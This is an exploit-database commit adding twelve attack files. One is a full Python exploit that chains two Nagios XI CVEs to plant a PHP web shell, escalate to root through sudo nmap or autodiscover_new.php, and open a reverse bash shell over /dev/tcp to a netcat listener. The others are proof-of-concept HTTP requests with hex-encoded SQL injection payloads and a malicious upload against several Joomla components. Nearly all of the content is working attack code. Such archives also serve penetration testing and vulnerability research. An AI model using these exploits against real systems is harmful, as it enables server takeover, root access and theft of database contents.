From 9ef926e1a199151bf9582a433d5d0e01e3cc53ba Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 24 Jan 2019 05:01:41 +0000 Subject: [PATCH] DB: 2019-01-24 12 changes to exploits/shellcodes Microsoft Windows CONTACT - HTML Injection / Remote Code Execution Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation Joomla! Component vBizz 1.0.7 - SQL Injection Joomla! Component vBizz 1.0.7 - Remote Code Execution Joomla! Component vWishlist 1.0.1 - SQL Injection Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection Joomla! Component vReview 1.9.11 - SQL Injection Joomla! Component vRestaurant 1.9.4 - SQL Injection Joomla! Component VMap 1.9.6 - SQL Injection Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection --- exploits/linux/webapps/46221.py | 256 +++++++++++++++++++++++++++++++ exploits/php/webapps/46223.txt | 45 ++++++ exploits/php/webapps/46224.txt | 177 +++++++++++++++++++++ exploits/php/webapps/46225.txt | 72 +++++++++ exploits/php/webapps/46226.txt | 42 +++++ exploits/php/webapps/46227.txt | 70 +++++++++ exploits/php/webapps/46228.txt | 47 ++++++ exploits/php/webapps/46229.txt | 38 +++++ exploits/php/webapps/46230.txt | 37 +++++ exploits/php/webapps/46231.txt | 44 ++++++ exploits/php/webapps/46232.txt | 43 ++++++ exploits/windows/local/46222.txt | 82 ++++++++++ files_exploits.csv | 12 ++ 13 files changed, 965 insertions(+) create mode 100755 exploits/linux/webapps/46221.py create mode 100644 exploits/php/webapps/46223.txt create mode 100644 exploits/php/webapps/46224.txt create mode 100644 exploits/php/webapps/46225.txt create mode 100644 exploits/php/webapps/46226.txt create mode 100644 exploits/php/webapps/46227.txt create mode 100644 exploits/php/webapps/46228.txt create mode 100644 exploits/php/webapps/46229.txt create mode 100644 exploits/php/webapps/46230.txt create mode 100644 exploits/php/webapps/46231.txt create mode 100644 exploits/php/webapps/46232.txt create mode 100644 exploits/windows/local/46222.txt diff --git a/exploits/linux/webapps/46221.py b/exploits/linux/webapps/46221.py new file mode 100755 index 000000000..7d12cf211 --- /dev/null +++ b/exploits/linux/webapps/46221.py @@ -0,0 +1,256 @@ +# Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation +# Date: 2019-01-22 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: https://www.nagios.com/ +# Product: Nagios XI +# Software Link: https://assets.nagios.com/downloads/nagiosxi/5/xi-5.5.6.tar.gz +# Version: From 2012r1.0 to 5.5.6 +# Tested on: +# - CentOS Linux 7.5.1804 (Core) / Kernel 3.10.0 / This was a vendor-provided .OVA file +# - Nagios XI 2012r1.0, 5r1.0, and 5.5.6 +# CVE: CVE-2018-15708, CVE-2018-15710 +# +# See Also: +# https://www.tenable.com/security/research/tra-2018-37 +# https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172 +# +# This code exploits both CVE-2018-15708 and CVE-2018-15710 to pop a root reverse shell. +# You'll need your own Netcat listener + +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler +import SocketServer, threading, ssl +import requests, urllib +import sys, os, argparse +from OpenSSL import crypto +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +TIMEOUT = 5 # sec + +def err_and_exit(msg): + print '\n\nERROR: ' + msg + '\n\n' + sys.exit(1) + +# handle sending a get request +def http_get_quiet(url): + try: + r = requests.get(url, timeout=TIMEOUT, verify=False) + except requests.exceptions.ReadTimeout: + err_and_exit("Request to '" + url + "' timed out.") + else: + return r + +# 200? +def url_ok(url): + r = http_get_quiet(url) + return (r.status_code == 200) + +# run a shell command using the PHP file we uploaded +def send_shell_cmd(path, cmd): + querystr = { 'cmd' : cmd } + # e.g. http://blah/exec.php?cmd=whoami + url = path + '?' + urllib.urlencode(querystr) + return http_get_quiet(url) + +# delete some files locally and on the Nagios XI instance +def clean_up(remote, paths, exec_path=None): + if remote: + for path in paths: + send_shell_cmd(exec_path, 'rm ' + path) + print 'Removing remote file ' + path + else: + for path in paths: + os.remove(path) + print 'Removing local file ' + path + +# Thanks http://django-notes.blogspot.com/2012/02/generating-self-signed-ssl-certificate.html +def generate_self_signed_cert(cert_dir, cert_file, key_file): + """Generate a SSL certificate. + + If the cert_path and the key_path are present they will be overwritten. + """ + if not os.path.exists(cert_dir): + os.makedirs(cert_dir) + cert_path = os.path.join(cert_dir, cert_file) + key_path = os.path.join(cert_dir, key_file) + + if os.path.exists(cert_path): + os.unlink(cert_path) + if os.path.exists(key_path): + os.unlink(key_path) + + # create a key pair + key = crypto.PKey() + key.generate_key(crypto.TYPE_RSA, 1024) + + # create a self-signed cert + cert = crypto.X509() + cert.get_subject().C = 'US' + cert.get_subject().ST = 'Lorem' + cert.get_subject().L = 'Ipsum' + cert.get_subject().O = 'Lorem' + cert.get_subject().OU = 'Ipsum' + cert.get_subject().CN = 'Unknown' + cert.set_serial_number(1000) + cert.gmtime_adj_notBefore(0) + cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60) + cert.set_issuer(cert.get_subject()) + cert.set_pubkey(key) + cert.sign(key, 'sha1') + + with open(cert_path, 'wt') as fd: + fd.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert)) + + with open(key_path, 'wt') as fd: + fd.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key)) + + return cert_path, key_path + +# HTTP request handler +class MyHTTPD(BaseHTTPRequestHandler): + def do_GET(self): + self.send_response(200) + msg = '' # this will be written to the PHP file + self.end_headers() + self.wfile.write(str.encode(msg)) + +# Make the http listener operate on its own thread +class ThreadedWebHandler(object): + def __init__(self, host, port, keyfile, certfile): + self.server = SocketServer.TCPServer((host, port), MyHTTPD) + self.server.socket = ssl.wrap_socket( + self.server.socket, + keyfile=keyfile, + certfile=certfile, + server_side=True + ) + self.server_thread = threading.Thread(target=self.server.serve_forever) + self.server_thread.daemon = True + + def start(self): + self.server_thread.start() + + def stop(self): + self.server.shutdown() + self.server.server_close() + +##### MAIN ##### + +desc = 'Nagios XI 2012r1.0 < 5.5.6 MagpieRSS Remote Code Execution and Privilege Escalation' +arg_parser = argparse.ArgumentParser(description=desc) +arg_parser.add_argument('-t', required=True, help='Nagios XI IP Address (Required)') +arg_parser.add_argument('-ip', required=True, help='HTTP listener IP') +arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)') +arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP') +arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)') + +args = arg_parser.parse_args() + +# Nagios XI target settings +target = { 'ip' : args.t } + +# listener settings +listener = { + 'ip' : args.ip, + 'port' : args.port, + 'ncip' : args.ncip, + 'ncport': args.ncport +} + +# generate self-signed cert +cert_file = 'cert.crt' +key_file = 'key.key' +generate_self_signed_cert('./', cert_file, key_file) + +# start threaded listener +# thanks http://brahmlower.io/threaded-http-server.html +server = ThreadedWebHandler(listener['ip'], listener['port'], key_file, cert_file) +server.start() + +print "\nListening on " + listener['ip'] + ":" + str(listener['port']) + +# path to Nagios XI app +base_url = 'https://' + target['ip'] + +# ensure magpie_debug.php exists +magpie_url = base_url + '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php' +if not url_ok(magpie_url): + err_and_exit('magpie_debug.php not found.') + +print '\nFound magpie_debug.php.\n' + +exec_path = None # path to exec.php in URL +cleanup_paths = [] # local path on Nagios XI filesystem to clean up +# ( local fs path : url path ) +paths = [ + ( '/usr/local/nagvis/share/', '/nagvis' ), + ( '/var/www/html/nagiosql/', '/nagiosql' ) +] + +# inject argument to create exec.php +# try multiple directories if necessary. dir will be different based on nagios xi version +filename = 'exec.php' +for path in paths: + local_path = path[0] + filename # on fs + url = 'https://' + listener['ip'] + ':' + str(listener['port']) + '/%20-o%20' + local_path # e.g. https://192.168.1.191:8080/%20-o%20/var/www/html/nagiosql/exec.php + url = magpie_url + '?url=' + url + print 'magpie url = ' + url + r = http_get_quiet(url) + + # ensure php file was created + exec_url = base_url + path[1] + '/' + filename # e.g. https://192.168.1.192/nagiosql/exec.php + if url_ok(exec_url): + exec_path = exec_url + cleanup_paths.append(local_path) + break + # otherwise, try the next path + +if exec_path is None: + err_and_exit('Couldn\'t create PHP file.') + +print '\n' + filename + ' written. Visit ' + exec_url + '\n' + +# run a few commands to display status to user +print 'Gathering some basic info...' +cmds = [ + ('whoami', 'Current User'), + ("cat /usr/local/nagiosxi/var/xiversion | grep full | cut -d '=' -f 2", 'Nagios XI Version') +] + +for cmd in cmds: + r = send_shell_cmd(exec_url, cmd[0]) + sys.stdout.write('\t' + cmd[1] + ' => ' + r.text) + +# candidates for privilege escalation +# depends on Nagios XI version +rev_bash_shell = '/bin/bash -i >& /dev/tcp/' + listener['ncip'] + '/' + str(listener['ncport']) + ' 0>&1' +# tuple contains (shell command, cleanup path) +priv_esc_list = [ + ("echo 'os.execute(\"" + rev_bash_shell + "\")' > /var/tmp/shell.nse && sudo nmap --script /var/tmp/shell.nse", '/var/tmp/shell.nse'), + ("sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php --addresses='127.0.0.1/1`" + rev_bash_shell + "`'", None) +] + +# escalate privileges and launch the connect-back shell +timed_out = False +for priv_esc in priv_esc_list: + try: + querystr = { 'cmd' : priv_esc[0] } + url = exec_path + '?' + urllib.urlencode(querystr) + r = requests.get(url, timeout=TIMEOUT, verify=False) + print '\nTrying to escalate privs with url: ' + url + except requests.exceptions.ReadTimeout: + timed_out = True + if priv_esc[1] is not None: + cleanup_paths.append(priv_esc[1]) + break + +if timed_out: + print 'Check for a shell!!\n' +else: + print 'Not so sure it worked...\n' + +server.stop() + +# clean up files we created +clean_up(True, cleanup_paths, exec_path) # remote files +clean_up(False, [cert_file, key_file]) \ No newline at end of file diff --git a/exploits/php/webapps/46223.txt b/exploits/php/webapps/46223.txt new file mode 100644 index 000000000..5803a0373 --- /dev/null +++ b/exploits/php/webapps/46223.txt @@ -0,0 +1,45 @@ +# Exploit Title: Joomla! Component vBizz 1.0.7 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://wdmtech.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/ +# Version: 1.0.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php +# + +POST /[PATH]/index.php? HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 726 +Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310; joomla_user_state=logged_in +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +profile_pic=&name=test&username=test&password=&user_role=11&email=test@test.test&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7&amount[]=0.00&payid[]=8&amount[]=0.00&payid[]=9%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&lastIncrement=7&option=com_vbizz&id=60&userid=60&task=apply&view=employee: undefined +HTTP/1.1 500 Internal Server Error +X-Powered-By: PHP/5.6.36 +Cache-Control: no-cache +Pragma: no-cache +Content-Type: text/html; charset=UTF-8 +Server: - Web acceleration by http://target/ +X-Cacheable: NO: beresp.status +X-Cacheable-status: 500 +Content-Length: 4278 +Accept-Ranges: bytes +Date: Tue, 22 Jan 2019 21:10:53 GMT +X-Varnish: 561075451 +Age: 0 +Via: 1.1 varnish +Connection: keep-alive +X-Cache: MISS \ No newline at end of file diff --git a/exploits/php/webapps/46224.txt b/exploits/php/webapps/46224.txt new file mode 100644 index 000000000..d05645c26 --- /dev/null +++ b/exploits/php/webapps/46224.txt @@ -0,0 +1,177 @@ +# Exploit Title: Joomla! Component vBizz 1.0.7 - Remote Code Execution +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://wdmtech.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/ +# Version: 1.0.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?option=com_vbizz&view=employee +# + +POST /[PATH]/index.php?option=com_vbizz&view=employee HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/octet-stream +Content-Length: 3876 +Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60 +Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +-----------------------------21301381330395: undefined +Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php" + +-----------------------------21301381330395 +Content-Disposition: form-data; name="name" +test +-----------------------------21301381330395 +Content-Disposition: form-data; name="username" +test +-----------------------------21301381330395 +Content-Disposition: form-data; name="password" +-----------------------------21301381330395 +Content-Disposition: form-data; name="user_role" +11 +-----------------------------21301381330395 +Content-Disposition: form-data; name="email" +test@test.test +-----------------------------21301381330395 +Content-Disposition: form-data; name="empid" +1 +-----------------------------21301381330395 +Content-Disposition: form-data; name="department" +5 +-----------------------------21301381330395 +Content-Disposition: form-data; name="designation" +6 +-----------------------------21301381330395 +Content-Disposition: form-data; name="phone" +-----------------------------21301381330395 +Content-Disposition: form-data; name="gender" +1 +-----------------------------21301381330395 +Content-Disposition: form-data; name="blood_group" +A+ +-----------------------------21301381330395 +Content-Disposition: form-data; name="dob" +-1-11-30 +-----------------------------21301381330395 +Content-Disposition: form-data; name="present_address" +-----------------------------21301381330395 +Content-Disposition: form-data; name="permanent_address" +-----------------------------21301381330395 +Content-Disposition: form-data; name="joining_date" +-1-11-30 +-----------------------------21301381330395 +Content-Disposition: form-data; name="work_type" +permanent +-----------------------------21301381330395 +Content-Disposition: form-data; name="payment_type" +bank +-----------------------------21301381330395 +Content-Disposition: form-data; name="pan" +-----------------------------21301381330395 +Content-Disposition: form-data; name="pf_ac" +0 +-----------------------------21301381330395 +Content-Disposition: form-data; name="bank_ac" +0 +-----------------------------21301381330395 +Content-Disposition: form-data; name="bank_name" +-----------------------------21301381330395 +Content-Disposition: form-data; name="bank_branch" +-----------------------------21301381330395 +Content-Disposition: form-data; name="ifsc" +-----------------------------21301381330395 +Content-Disposition: form-data; name="leaving_date" +-1-11-30 +-----------------------------21301381330395 +Content-Disposition: form-data; name="amount[]" +111.00 +-----------------------------21301381330395 +Content-Disposition: form-data; name="payid[]" +7 +-----------------------------21301381330395 +Content-Disposition: form-data; name="amount[]" +0.00 +-----------------------------21301381330395 +Content-Disposition: form-data; name="payid[]" +8 +-----------------------------21301381330395 +Content-Disposition: form-data; name="amount[]" +0.00 +-----------------------------21301381330395 +Content-Disposition: form-data; name="payid[]" +9 +-----------------------------21301381330395 +Content-Disposition: form-data; name="lastIncrement" +7 +-----------------------------21301381330395 +Content-Disposition: form-data; name="option" +com_vbizz +-----------------------------21301381330395 +Content-Disposition: form-data; name="id" +60 +-----------------------------21301381330395 +Content-Disposition: form-data; name="userid" +60 +-----------------------------21301381330395 +Content-Disposition: form-data; name="task" + +apply +-----------------------------21301381330395 +Content-Disposition: form-data; name="view" +employee +-----------------------------21301381330395-- +HTTP/1.1 303 See other +X-Powered-By: PHP/5.6.36 +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: /index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60 +Last-Modified: Tue, 22 Jan 2019 21:21:40 GMT +Content-Type: text/html; charset=utf-8 +Server: - Web acceleration by http://target/ +X-Cacheable: YES +Content-Length: 28854 +Accept-Ranges: bytes +Date: Tue, 22 Jan 2019 21:21:40 GMT +X-Varnish: 561081442 +Via: 1.1 varnish +Connection: keep-alive +age: 0 +X-Cache: MISS + +GET /components/com_vbizz/uploads/profile_pics/1548192100phpinfo.php HTTP/1.1 +Host: vbizz-for-joomla.wdmtech.com +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60 +Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in +DNT: 1 +Connection: keep-alive +HTTP/1.1 200 OK +X-Powered-By: PHP/5.6.36 +Content-Type: text/html; charset=UTF-8 +Server: - Web acceleration by http://target/ +X-Cacheable: YES +Content-Length: 110286 +Accept-Ranges: bytes +Date: Tue, 22 Jan 2019 21:21:44 GMT +X-Varnish: 561081464 +Via: 1.1 varnish +Connection: keep-alive +age: 0 +X-Cache: MISS \ No newline at end of file diff --git a/exploits/php/webapps/46225.txt b/exploits/php/webapps/46225.txt new file mode 100644 index 000000000..2526ce1e8 --- /dev/null +++ b/exploits/php/webapps/46225.txt @@ -0,0 +1,72 @@ +# Exploit Title: Joomla! Component vWishlist 1.0.1 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://wdmtech.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/extension-specific/virtuemart-extensions/vwishlist/ +# Version: 1.0.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]// +# + +POST /[PATH]/ HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 372 +Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58: undefined +HTTP/1.1 500 XPATH syntax error:... +Date: Tue, 22 Jan 2019 21:54:01 GMT +Server: Apache +X-Powered-By: PHP/5.6.16 +X-Logged-In: True +P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" +Cache-Control: no-cache +Pragma: no-cache +Vary: Accept-Encoding +Connection: close +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked + +# POC: +# 2) +# http://localhost/[PATH]// +# + +POST /[PATH]/ HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 372 +Cookie: 1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b9; activeProfile=0; joomla_user_state=logged_in +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +option=com_vwishlist&task=wishlist&wishval=1&userid=711%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58&numofQuantity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48: undefined +HTTP/1.1 500 XPATH syntax error:... +Date: Tue, 22 Jan 2019 21:53:42 GMT +Server: Apache +X-Powered-By: PHP/5.6.16 +X-Logged-In: True +P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" +Cache-Control: no-cache +Pragma: no-cache +Vary: Accept-Encoding +Connection: close +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/46226.txt b/exploits/php/webapps/46226.txt new file mode 100644 index 000000000..4cfb7ebdd --- /dev/null +++ b/exploits/php/webapps/46226.txt @@ -0,0 +1,42 @@ +# Exploit Title: Joomla! Component vAccount 2.0.2 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://wdmtech.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/financial/cost-calculators/vaccount/ +# Version: 2.0.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/vaccount-dashboard/expense?vid=[SQL] +# + +GET /[PATH]/vaccount-dashboard/expense?vid=18%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29,%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: 39b5054fae6740372b1521628707bdc7=pusmhir0h1896vr6v5dvmnqd46 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 500 Internal Server Error +X-Powered-By: PHP/5.6.36 +Cache-Control: no-cache +Pragma: no-cache +Content-Type: text/html; charset=UTF-8 +Server: - Web acceleration by http://target/ +X-Cacheable: NO: beresp.status +X-Cacheable-status: 500 +Content-Length: 4216 +Accept-Ranges: bytes +Date: Tue, 22 Jan 2019 21:33:56 GMT +X-Varnish: 561086750 +Age: 0 +Via: 1.1 varnish +Connection: keep-alive +X-Cache: MISS \ No newline at end of file diff --git a/exploits/php/webapps/46227.txt b/exploits/php/webapps/46227.txt new file mode 100644 index 000000000..74ca798e7 --- /dev/null +++ b/exploits/php/webapps/46227.txt @@ -0,0 +1,70 @@ +# Exploit Title: Joomla! Component vReview 1.9.11 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://wdmtech.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/ratings-a-reviews/vreview/ +# Version: 1.9.11 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?option=com_vreview&task=editReview +# + +POST /[PATH]/index.php?option=com_vreview&task=editReview HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 210 +Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +cmId=%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d: undefined +HTTP/1.1 200 OK +Date: Tue, 22 Jan 2019 19:41:46 GMT +Server: Apache +X-Powered-By: PHP/5.6.16 +Vary: Accept-Encoding +Keep-Alive: timeout=5, max=98 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked + +# POC: +# 2) +# http://localhost/[PATH]/index.php?option=com_vreview&task=displayRecords +# + +POST /[PATH]/index.php?option=com_vreview&task=displayReply HTTP/1.1 +POST /[PATH]/index.php?option=com_vreview&task=displayRecords HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 424 +Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +profileid=%39%39%39%39%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2d%2d%20%2d: undefined +HTTP/1.1 500.... +Date: Tue, 22 Jan 2019 19:33:39 GMT +Server: Apache +X-Powered-By: PHP/5.6.16 +X-Logged-In: False +P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" +Cache-Control: no-cache +Pragma: no-cache +Vary: Accept-Encoding +Connection: close +Content-Type: text/html; charset=UTF-8 +Transfer-Encoding: chunked \ No newline at end of file diff --git a/exploits/php/webapps/46228.txt b/exploits/php/webapps/46228.txt new file mode 100644 index 000000000..f81c404d4 --- /dev/null +++ b/exploits/php/webapps/46228.txt @@ -0,0 +1,47 @@ +# Exploit Title: Joomla! Component vRestaurant 1.9.4 - SQL Injection +# Dork: N/A +# Date: 2019-01-23 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://wdmtech.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/vrestaurant/ +# Version: 1.9.4 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/menu-listing-layout/menuitems +# + 